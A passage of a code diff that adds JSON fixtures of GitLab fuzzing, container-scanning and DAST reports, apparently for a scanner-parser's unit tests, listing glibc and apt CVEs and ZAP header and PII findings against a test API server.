0x18)\n\tgitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/go-fuzzing-example/go.fuzz.main/main.go:35 +0x85\nmain._cgoexpwrap_12b3abfc237e_LLVMFuzzerTestOneInput(0x2e9a6b0, 0x6, 0x5a4d80)\n\t_cgo_gotypes.go:64 +0x37\n==1330== ERROR: libFuzzer: deadly signal\n #0 0x450ddf in __sanitizer_print_stack_trace (/builds/gitlab-org/security-products/demos/coverage-fuzzing/go-fuzzing-example/fuzzer+0x450ddf)\n #1 0x430f4b in fuzzer::PrintStackTrace() (/builds/gitlab-org/security-products/demos/coverage-fuzzing/go-fuzzing-example/fuzzer+0x430f4b)\n #2 0x414b7b in fuzzer::Fuzzer::CrashCallback() (/builds/gitlab-org/security-products/demos/coverage-fuzzing/go-fuzzing-example/fuzzer+0x414b7b)\n #3 0x414b3f in fuzzer::Fuzzer::StaticCrashSignalCallback() (/builds/gitlab-org/security-products/demos/coverage-fuzzing/go-fuzzing-example/fuzzer+0x414b3f)\n #4 0x7f3eae9b372f (/lib/x86_64-linux-gnu/libpthread.so.0+0x1272f)\n #5 0x4b3a80 in runtime.raise runtime/sys_linux_amd64.s:164\n\nNOTE: libFuzzer has rudimentary signal handlers.\n Combine libFuzzer with AddressSanitizer or similar for better crash reports.\nSUMMARY: libFuzzer: deadly signal\nMS: 1 ChangeByte-; base unit: 7442c1f343cf72f63e3f35bb1dcb221390e01080\n0x46,0x55,0x5a,0x5a,0x49,0x4e,\nFUZZIN\nartifact_prefix='./crashes/'; Test unit written to ./crashes/crash-14b5f09dd74fe15430d803af773ba09a0524670d\nBase64: RlVaWklO\nstat::number_of_executed_units: 47920\nstat::average_exec_per_sec: 11980\nstat::new_units_added: 0\nstat::slowest_unit_time_sec: 0\nstat::peak_rss_mb: 40\n" + }, + "identifiers": [ + { + "type": "cwe", + "name": "Index-out-of-range", + "value": "129", + "url": "https://cwe.mitre.org/data/definitions/129.html" + } + ] + } + ], + "remediations": [], + "scan": { + "scanner": { + "id": "libfuzzer", + "name": "libfuzzer", + "url": "https://docs.gitlab.com/ee/user/application_security/coverage_fuzzing", + "vendor": { + "name": "GitLab" + }, + "version": "f248ff98" + }, + "type": "coverage_fuzzing", + "start_time": "2021-02-08T12:19:48", + "end_time": "2021-02-08T12:19:54", + "status": "success" + } +} diff --git a/unittests/scans/gitlab_container_scan/gl-container-scanning-report-1-vuln.json b/unittests/scans/gitlab_container_scan/gl-container-scanning-report-1-vuln.json new file mode 100644 index 00000000000..f7548c73e09 --- /dev/null +++ b/unittests/scans/gitlab_container_scan/gl-container-scanning-report-1-vuln.json @@ -0,0 +1,87 @@ +{ + "version": "3.0.0", + "vulnerabilities": [ + { + "id": "df52bc8ce9a2ae56bbcb0c4ecda62123fbd6f69b", + "category": "container_scanning", + "message": "CVE-2019-3462 in apt-1.4.8", + "description": "Incorrect sanitation of the 302 redirect field in HTTP transport method of apt versions 1.4.8 and earlier can lead to content injection by a MITM attacker, potentially leading to remote code execution on the target machine.", + "severity": "High", + "confidence": "Unknown", + "solution": "Upgrade apt from 1.4.8 to 1.4.9", + "scanner": { + "id": "trivy", + "name": "trivy" + }, + "location": { + "dependency": { + "package": { + "name": "apt" + }, + "version": "1.4.8" + }, + "operating_system": "debian:9.4", + "image": "registry.gitlab.com/gitlab-org/security-products/dast/webgoat-8.0@sha256:bc09fe2e0721dfaeee79364115aeedf2174cce0947b9ae5fe7c33312ee019a4e" + }, + "identifiers": [ + { + "type": "cve", + "name": "CVE-2019-3462", + "value": "CVE-2019-3462", + "url": "http://www.securityfocus.com/bid/106690" + } + ], + "links": [ + { + "url": "http://www.securityfocus.com/bid/106690" + }, + { + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3462" + }, + { + "url": "https://lists.apache.org/thread.html/8338a0f605bdbb3a6098bb76f666a95fc2b2f53f37fa1ecc89f1146f@%3Cdevnull.infra.apache.org%3E" + }, + { + "url": "https://lists.debian.org/debian-lts-announce/2019/01/msg00013.html" + }, + { + "url": "https://lists.debian.org/debian-lts-announce/2019/01/msg00014.html" + }, + { + "url": "https://security.netapp.com/advisory/ntap-20190125-0002/" + }, + { + "url": "https://usn.ubuntu.com/3863-1/" + }, + { + "url": "https://usn.ubuntu.com/3863-2/" + }, + { + "url": "https://usn.ubuntu.com/usn/usn-3863-1" + }, + { + "url": "https://usn.ubuntu.com/usn/usn-3863-2" + }, + { + "url": "https://www.debian.org/security/2019/dsa-4371" + } + ] + } + ], + "remediations": [], + "scan": { + "scanner": { + "id": "trivy", + "name": "Trivy", + "url": "https://github.com/aquasecurity/trivy/", + "vendor": { + "name": "GitLab" + }, + "version": "0.16.0" + }, + "type": "container_scanning", + "start_time": "2021-04-14T19:45:58", + "end_time": "2021-04-14T19:46:18", + "status": "success" + } +} diff --git a/unittests/scans/gitlab_container_scan/gl-container-scanning-report-5-vuln.json b/unittests/scans/gitlab_container_scan/gl-container-scanning-report-5-vuln.json new file mode 100644 index 00000000000..fd75515225e --- /dev/null +++ b/unittests/scans/gitlab_container_scan/gl-container-scanning-report-5-vuln.json @@ -0,0 +1,226 @@ +{ + "version": "3.0.0", + "vulnerabilities": [ + { + "id": "e3923d3ecd659db1569dd8f10768189b9220cce7", + "category": "container_scanning", + "message": "CVE-2020-1751 in libc6-2.28-10", + "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", + "cve": "CVE-2020-1751", + "severity": "High", + "confidence": "Unknown", + "solution": "No solution provided", + "scanner": { "id": "trivy", "name": "trivy" }, + "location": { + "dependency": { "package": { "name": "libc6" }, "version": "2.28-10" }, + "operating_system": "debian 10.9", + "image": "registry/vulnerable-project:latest" + }, + "identifiers": [ + { + "type": "cve", + "name": "CVE-2020-1751", + "value": "CVE-2020-1751", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751" + } + ], + "links": [ + { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751" }, + { + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751" + }, + { "url": "https://linux.oracle.com/cve/CVE-2020-1751.html" }, + { "url": "https://linux.oracle.com/errata/ELSA-2020-4444.html" }, + { "url": "https://security.gentoo.org/glsa/202006-04" }, + { "url": "https://security.netapp.com/advisory/ntap-20200430-0002/" }, + { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423" }, + { "url": "https://usn.ubuntu.com/4416-1/" }, + { "url": "https://usn.ubuntu.com/usn/usn-4416-1" } + ] + }, + { + "id": "539b91e1bbb1c1a89cd34310c462e113b55a3a47", + "category": "container_scanning", + "message": "CVE-2020-1752 in libc6-2.28-10", + "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", + "cve": "CVE-2020-1752", + "severity": "High", + "confidence": "Unknown", + "solution": "No solution provided", + "scanner": { "id": "trivy", "name": "trivy" }, + "location": { + "dependency": { "package": { "name": "libc6" }, "version": "2.28-10" }, + "operating_system": "debian 10.9", + "image": "registry/vulnerable-project:latest" + }, + "identifiers": [ + { + "type": "cve", + "name": "CVE-2020-1752", + "value": "CVE-2020-1752", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752" + } + ], + "links": [ + { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752" }, + { + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752" + }, + { "url": "https://linux.oracle.com/cve/CVE-2020-1752.html" }, + { "url": "https://linux.oracle.com/errata/ELSA-2020-4444.html" }, + { "url": "https://security.gentoo.org/glsa/202101-20" }, + { "url": "https://security.netapp.com/advisory/ntap-20200511-0005/" }, + { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414" }, + { + "url": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c" + }, + { "url": "https://usn.ubuntu.com/4416-1/" }, + { "url": "https://usn.ubuntu.com/usn/usn-4416-1" } + ] + }, + { + "id": "c10ff6acb5bda2aa0917b507d15dcc5084231995", + "category": "container_scanning", + "message": "CVE-2021-3326 in libc6-2.28-10", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", + "cve": "CVE-2021-3326", + "severity": "High", + "confidence": "Unknown", + "solution": "No solution provided", + "scanner": { "id": "trivy", "name": "trivy" }, + "location": { + "dependency": { "package": { "name": "libc6" }, "version": "2.28-10" }, + "operating_system": "debian 10.9", + "image": "registry/vulnerable-project:latest" + }, + "identifiers": [ + { + "type": "cve", + "name": "CVE-2021-3326", + "value": "CVE-2021-3326", + "url": "http://www.openwall.com/lists/oss-security/2021/01/28/2" + } + ], + "links": [ + { "url": "http://www.openwall.com/lists/oss-security/2021/01/28/2" }, + { "url": "https://linux.oracle.com/cve/CVE-2021-3326.html" }, + { "url": "https://linux.oracle.com/errata/ELSA-2021-1585.html" }, + { "url": "https://security.netapp.com/advisory/ntap-20210304-0007/" }, + { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256" }, + { + "url": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888" + } + ] + }, + { + "id": "9b3644fda668e8cff802e55229ec84bf142a62e3", + "category": "container_scanning", + "message": "CVE-2021-33574 in libc6-2.28-10", + "description": "The mq_notify function in the GNU C Library (aka glibc) through 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", + "cve": "CVE-2021-33574", + "severity": "High", + "confidence": "Unknown", + "solution": "No solution provided", + "scanner": { "id": "trivy", "name": "trivy" }, + "location": { + "dependency": { "package": { "name": "libc6" }, "version": "2.28-10" }, + "operating_system": "debian 10.9", + "image": "registry/vulnerable-project:latest" + }, + "identifiers": [ + { + "type": "cve", + "name": "CVE-2021-33574", + "value": "CVE-2021-33574", + "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896" + } + ], + "links": [ + { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896" } + ] + }, + { + "id": "e06a8d6ae0aabb679a54fdd4082ff78b96c2f9fd", + "category": "container_scanning", + "message": "CVE-2019-25013 in libc6-2.28-10", + "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "cve": "CVE-2019-25013", + "severity": "Medium", + "confidence": "Unknown", + "solution": "No solution provided", + "scanner": { "id": "trivy", "name": "trivy" }, + "location": { + "dependency": { "package": { "name": "libc6" }, "version": "2.28-10" }, + "operating_system": "debian 10.9", + "image": "registry/vulnerable-project:latest" + }, + "identifiers": [ + { + "type": "cve", + "name": "CVE-2019-25013", + "value": "CVE-2019-25013", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013" + } + ], + "links": [ + { + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013" + }, + { "url": "https://linux.oracle.com/cve/CVE-2019-25013.html" }, + { "url": "https://linux.oracle.com/errata/ELSA-2021-1585.html" }, + { + "url": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E" + }, + { + "url": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E" + }, + { + "url": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E" + }, + { + "url": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E" + }, + { + "url": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E" + }, + { + "url": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E" + }, + { + "url": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E" + }, + { + "url": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E" + }, + { + "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E" + }, + { + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/" + }, + { + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/" + }, + { "url": "https://security.netapp.com/advisory/ntap-20210205-0004/" }, + { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973" }, + { + "url": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b" + } + ] + } + ], + "remediations": [], + "scan": { + "scanner": { + "id": "trivy", + "name": "Trivy", + "url": "https://github.com/aquasecurity/trivy/", + "vendor": { "name": "GitLab" }, + "version": "0.16.0" + }, + "type": "container_scanning", + "start_time": "2021-06-01T21:20:59", + "end_time": "2021-06-01T21:21:00", + "status": "success" + } +} diff --git a/unittests/scans/gitlab_dast/gitlab_dast_many_vul.json b/unittests/scans/gitlab_dast/gitlab_dast_many_vul.json new file mode 100644 index 00000000000..fce300c7329 --- /dev/null +++ b/unittests/scans/gitlab_dast/gitlab_dast_many_vul.json @@ -0,0 +1,1422 @@ +{ + "@generated": "Fri, 23 Apr 2021 15:46:48", + "@version": "D-2020-08-26", + "remediations": [], + "scan": { + "end_time": "2021-04-23T15:46:48", + "messages": [], + "scanned_resources": [ + { + "method": "GET", + "type": "url", + "url": "http://api-server/" + }, + { + "method": "GET", + "type": "url", + "url": "http://api-server/v1" + }, + { + "method": "DELETE", + "type": "url", + "url": "http://api-server/v1/tree/10" + }, + { + "method": "GET", + "type": "url", + "url": "http://api-server/v1/tree/10" + }, + { + "method": "GET", + "type": "url", + "url": "http://api-server/v1/trees" + }, + { + "method": "POST", + "type": "url", + "url": "http://api-server/v1/trees" + } + ], + "scanner": { + "id": "zaproxy", + "name": "OWASP Zed Attack Proxy (ZAP)", + "url": "https://www.zaproxy.org", + "version": "D-2020-08-26", + "vendor": { + "name": "GitLab" + } + }, + "start_time": "2021-04-23T15:46:34", + "status": "success", + "type": "dast" + }, + "site": [ + { + "@host": "api-server", + "@name": "http://api-server", + "@port": "80", + "@ssl": "false", + "alerts": [ + { + "alert": "PII Disclosure", + "confidence": "3", + "count": "1", + "cweid": "359", + "desc": "

    The response contains Personally Identifiable Information, such as CC number, SSN and similar sensitive data.

    ", + "instances": [ + { + "attack": "", + "evidence": "378282246310005", + "method": "GET", + "param": "", + "uri": "http://api-server/v1/trees" + } + ], + "name": "PII Disclosure", + "otherinfo": "

    Credit Card Type detected: American Express

    Bank Identification Number: 378282

    Brand: AMERICAN EXPRESS

    Category: SMALL CORPORATE

    Issuer: AMERICAN EXPRESS COMPANY

    ", + "pluginid": "10062", + "reference": "

    ", + "riskcode": "3", + "riskdesc": "High (High)", + "solution": "

    ", + "sourceid": "3" + }, + { + "alert": "Content Security Policy (CSP) Header Not Set", + "confidence": "3", + "count": "1", + "cweid": "16", + "desc": "

    Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page \u2014 covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.

    ", + "instances": [ + { + "attack": "", + "evidence": "", + "method": "DELETE", + "param": "", + "uri": "http://api-server/v1/tree/10" + } + ], + "name": "Content Security Policy (CSP) Header Not Set", + "otherinfo": "", + "pluginid": "10038", + "reference": "

    https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy

    https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html

    http://www.w3.org/TR/CSP/

    http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html

    http://www.html5rocks.com/en/tutorials/security/content-security-policy/

    http://caniuse.com/#feat=contentsecuritypolicy

    http://content-security-policy.com/

    ", + "riskcode": "2", + "riskdesc": "Medium (High)", + "solution": "

    Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header, to achieve optimal browser support: \"Content-Security-Policy\" for Chrome 25+, Firefox 23+ and Safari 7+, \"X-Content-Security-Policy\" for Firefox 4.0+ and Internet Explorer 10+, and \"X-WebKit-CSP\" for Chrome 14+ and Safari 6+.

    ", + "sourceid": "3" + }, + { + "alert": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "confidence": "3", + "count": "6", + "cweid": "200", + "desc": "

    The web/application server is leaking version information via the \"Server\" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.

    ", + "instances": [ + { + "attack": "", + "evidence": "nginx/1.17.6", + "method": "GET", + "param": "", + "uri": "http://api-server/" + }, + { + "attack": "", + "evidence": "nginx/1.17.6", + "method": "DELETE", + "param": "", + "uri": "http://api-server/v1/tree/10" + }, + { + "attack": "", + "evidence": "nginx/1.17.6", + "method": "GET", + "param": "", + "uri": "http://api-server/v1/tree/10" + }, + { + "attack": "", + "evidence": "nginx/1.17.6", + "method": "GET", + "param": "", + "uri": "http://api-server/v1/trees" + }, + { + "attack": "", + "evidence": "nginx/1.17.6", + "method": "POST", + "param": "", + "uri": "http://api-server/v1/trees" + }, + { + "attack": "", + "evidence": "nginx/1.17.6", + "method": "GET", + "param": "", + "uri": "http://api-server/v1" + } + ], + "name": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "otherinfo": "", + "pluginid": "10036", + "reference": "

    http://httpd.apache.org/docs/current/mod/core.html#servertokens

    http://msdn.microsoft.com/en-us/library/ff648552.aspx#ht_urlscan_007

    http://blogs.msdn.com/b/varunm/archive/2013/04/23/remove-unwanted-http-response-headers.aspx

    http://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html

    ", + "riskcode": "1", + "riskdesc": "Low (High)", + "solution": "

    Ensure that your web server, application server, load balancer, etc. is configured to suppress the \"Server\" header or provide generic details.

    ", + "sourceid": "3" + }, + { + "alert": "X-Content-Type-Options Header Missing", + "confidence": "2", + "count": "2", + "cweid": "16", + "desc": "

    The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

    ", + "instances": [ + { + "attack": "", + "evidence": "", + "method": "GET", + "param": "X-Content-Type-Options", + "uri": "http://api-server/v1/trees" + }, + { + "attack": "", + "evidence": "", + "method": "POST", + "param": "X-Content-Type-Options", + "uri": "http://api-server/v1/trees" + } + ], + "name": "X-Content-Type-Options Header Missing", + "otherinfo": "

    This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

    At \"High\" threshold this scan rule will not alert on client or server error responses.

    ", + "pluginid": "10021", + "reference": "

    http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx

    https://owasp.org/www-community/Security_Headers

    ", + "riskcode": "1", + "riskdesc": "Low (Medium)", + "solution": "

    Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

    If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

    ", + "sourceid": "3" + } + ] + } + ], + "spider": { + "progress": "100", + "result": { + "urlsInScope": [ + { + "method": "", + "processed": "", + "reasonNotProcessed": "", + "statusCode": "", + "statusReason": "", + "url": "" + } + ], + "urlsIoError": [], + "urlsOutOfScope": [] + }, + "state": "FINISHED" + }, + "version": "13.1.0", + "vulnerabilities": [ + { + "category": "dast", + "confidence": "High", + "cve": "10062", + "description": "The response contains Personally Identifiable Information, such as CC number, SSN and similar sensitive data.", + "discovered_at": "2021-04-23T15:46:40.615", + "evidence": { + "request": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "method": "GET", + "url": "http://api-server/v1/trees" + }, + "response": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "reason_phrase": "OK", + "status_code": 200 + }, + "summary": "378282246310005; Credit Card Type detected: American Express Bank Identification Number: 378282 Brand: AMERICAN EXPRESS Category: SMALL CORPORATE Issuer: AMERICAN EXPRESS COMPANY" + }, + "id": "5ec00bbc-2e53-44cb-83e9-3d35365277e3", + "identifiers": [ + { + "name": "PII Disclosure", + "type": "ZAProxy_PluginId", + "url": "https://github.com/zaproxy/zaproxy/blob/w2019-01-14/docs/scanners.md", + "value": "10062" + }, + { + "name": "CWE-359", + "type": "CWE", + "url": "https://cwe.mitre.org/data/definitions/359.html", + "value": "359" + } + ], + "links": [], + "location": { + "hostname": "http://api-server", + "method": "GET", + "param": "", + "path": "/v1/trees" + }, + "message": "PII Disclosure", + "scanner": { + "id": "zaproxy", + "name": "ZAProxy" + }, + "severity": "High", + "solution": "" + }, + { + "category": "dast", + "confidence": "High", + "cve": "10038", + "description": "Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page \u2014 covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.", + "discovered_at": "2021-04-23T15:46:40.644", + "evidence": { + "request": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "method": "DELETE", + "url": "http://api-server/v1/tree/10" + }, + "response": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "reason_phrase": "Not Allowed", + "status_code": 405 + }, + "summary": "" + }, + "id": "87e98ddf-7d75-444a-be6d-45400151a0fe", + "identifiers": [ + { + "name": "Content Security Policy (CSP) Header Not Set", + "type": "ZAProxy_PluginId", + "url": "https://github.com/zaproxy/zaproxy/blob/w2019-01-14/docs/scanners.md", + "value": "10038" + }, + { + "name": "CWE-16", + "type": "CWE", + "url": "https://cwe.mitre.org/data/definitions/16.html", + "value": "16" + } + ], + "links": [ + { + "url": "https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy" + }, + { + "url": "https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html" + }, + { + "url": "http://www.w3.org/TR/CSP/" + }, + { + "url": "http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html" + }, + { + "url": "http://www.html5rocks.com/en/tutorials/security/content-security-policy/" + }, + { + "url": "http://caniuse.com/#feat=contentsecuritypolicy" + }, + { + "url": "http://content-security-policy.com/" + } + ], + "location": { + "hostname": "http://api-server", + "method": "DELETE", + "param": "", + "path": "/v1/tree/10" + }, + "message": "Content Security Policy (CSP) Header Not Set", + "scanner": { + "id": "zaproxy", + "name": "ZAProxy" + }, + "severity": "Medium", + "solution": "Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header, to achieve optimal browser support: \"Content-Security-Policy\" for Chrome 25+, Firefox 23+ and Safari 7+, \"X-Content-Security-Policy\" for Firefox 4.0+ and Internet Explorer 10+, and \"X-WebKit-CSP\" for Chrome 14+ and Safari 6+." + }, + { + "category": "dast", + "confidence": "High", + "cve": "10036", + "description": "The web/application server is leaking version information via the \"Server\" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.", + "discovered_at": "2021-04-23T15:46:40.644", + "evidence": { + "request": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "method": "DELETE", + "url": "http://api-server/v1/tree/10" + }, + "response": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "reason_phrase": "Not Allowed", + "status_code": 405 + }, + "summary": "nginx/1.17.6" + }, + "id": "df7641d3-1a33-4930-a1c7-e1cc5edfdc2f", + "identifiers": [ + { + "name": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "type": "ZAProxy_PluginId", + "url": "https://github.com/zaproxy/zaproxy/blob/w2019-01-14/docs/scanners.md", + "value": "10036" + }, + { + "name": "CWE-200", + "type": "CWE", + "url": "https://cwe.mitre.org/data/definitions/200.html", + "value": "200" + } + ], + "links": [ + { + "url": "http://httpd.apache.org/docs/current/mod/core.html#servertokens" + }, + { + "url": "http://msdn.microsoft.com/en-us/library/ff648552.aspx#ht_urlscan_007" + }, + { + "url": "http://blogs.msdn.com/b/varunm/archive/2013/04/23/remove-unwanted-http-response-headers.aspx" + }, + { + "url": "http://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html" + } + ], + "location": { + "hostname": "http://api-server", + "method": "DELETE", + "param": "", + "path": "/v1/tree/10" + }, + "message": "Server Leaks Version Information via \"Server\" HTTP Response Header Field", + "scanner": { + "id": "zaproxy", + "name": "ZAProxy" + }, + "severity": "Low", + "solution": "Ensure that your web server, application server, load balancer, etc. is configured to suppress the \"Server\" header or provide generic details." + }, + { + "category": "dast", + "confidence": "High", + "cve": "10036", + "description": "The web/application server is leaking version information via the \"Server\" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.", + "discovered_at": "2021-04-23T15:46:40.584", + "evidence": { + "request": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "method": "GET", + "url": "http://api-server/" + }, + "response": { + "headers": [ + { + "name": "Accept", + "value": "*/*" + }, + { + "name": "Authorization", + "value": "********" + }, + { + "name": "Cache-Control", + "value": "no-cache" + }, + { + "name": "Content-Length", + "value": "0" + }, + { + "name": "Host", + "value": "api-server" + }, + { + "name": "Pragma", + "value": "no-cache" + }, + { + "name": "User-Agent", + "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" + } + ], + "reason_phrase": "Moved Temporarily", + "status_code": 302 + }, + "summary": 